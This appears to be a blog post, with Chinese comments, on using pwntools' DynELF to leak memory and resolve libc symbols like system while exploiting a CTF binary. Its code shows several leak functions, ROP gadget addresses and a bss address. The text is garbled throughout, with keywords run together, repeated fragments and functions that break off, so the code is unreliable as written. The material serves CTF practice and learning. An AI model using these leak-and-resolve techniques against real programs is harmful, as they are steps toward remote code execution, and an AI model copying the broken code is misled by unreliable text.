# Assume a process or remote connection p = process('./pwnme')
# Declare a function that takes a single address, and leaks at least one byte at that address. defleak(address): data = p.read(address, 4) # data = p.recv(4) log.debug("%#x => %s" % (address, (data or'').encode('hex'))) return data
# For the sake of this example, let's say that we have any of these pointers. One is a pointer into the target binary, the other two are pointers into libc main = 0xfeedf4ce libc = 0xdeadb000 system = 0xdeadbeef
# With our leaker, and a pointer into our target binary, we can resolve the address of anything. # # We do not actually need to have a copy of the target binary for this to work. d = DynELF(leak, main) assert d.lookup(None, 'libc') == libc assert d.lookup('system', 'libc') == system
# However, if we do have a copy of the target binary, we can speed up some of the steps. d = DynELF(leak, main, elf=ELF('./pwnme')) assert d.lookup(None, 'libc') == libc assert d.lookup('system', 'libc') == system
# Alternately, we can resolve symbols inside another library, given a pointer into it. d = DynELF(leak, libc + 0x1234) assert d.lookup('system') == system # assert 断言,assert后的条件为真时执行,为假时抛出异常
defleak(address): count = 0 data = '' payload = xxx p.send(payload) print p.recvuntil('xxx\n') #一定要在puts前释放完输出,然后程序执行到retn,开始执行我们的payload up = ""
# while循环过滤得到泄露的地址 whileTrue: #由于接收完标志字符串结束的回车符后,就没有其他输出了,故先等待1秒钟,如果确实接收不到了,就说明输出结束了 #以便与不是标志字符串结束的回车符(0x0A)混淆,这也利用了recv函数的timeout参数,即当timeout结束后仍得不到输出,则直接返回空字符串”” c = p.recv(numb=1, timeout=1) count += 1 if up == '\n'and c == "": #接收到的上一个字符为回车符,而当前接收不到新字符,则 data = data[:-1] #删除puts函数输出的末尾回车符 data += "\x00" break else: data += c up = c data = data[:4] #取指定字节数 log.info("%#x => %s" % (address, (data or'').encode('hex'))) return data
defleak(address): count = 0 data = "" payload = xxx p.send(payload) print p.recvuntil("xxx\n") #一定要在puts前释放完输出 up = "" whileTrue: c = p.recv(1) count += 1 if up == '\n'and c == "x": #一定要找到泄漏信息的字符串特征,即puts函数输出完其他输出的第一串字符串的特征,这里用x表示 data = data[:-1] data += "\x00" break else: data += c up = c data = data[:4] log.info("%#x => %s" % (address, (data or'').encode('hex'))) return data
p.recvuntil("bye~\n") whileTrue: c = p.recv(numb=1,timeout=0.1) count += 1 if up == '\n'and c == '': data = data[:-1] data += "\x00" break else: data += c up = c data = data[:4] log.info("%#x => %s" % (addr, (data or'').encode('hex'))) return data
main = 0x04006B8 pop_rdi = 0x0400763 # pop rdi;ret
p.recvuntil("bye~\n") whileTrue: c = p.recv(numb=1,timeout=0.1) count += 1 if up == '\n'and c == '': data = data[:-1] data += "\x00" break else: data += c up = c data = data[:4] log.info("%#x => %s" % (addr, (data or'').encode('hex'))) return data
start = 0x00400550 main = 0x04006B8 pop_rdi = 0x0400763 # pop rdi;ret bss_addr = 0x0601060
You are welcome to share this blog, so that more people can participate in it. If the images used in the blog infringe your copyright, please contact the author to delete them.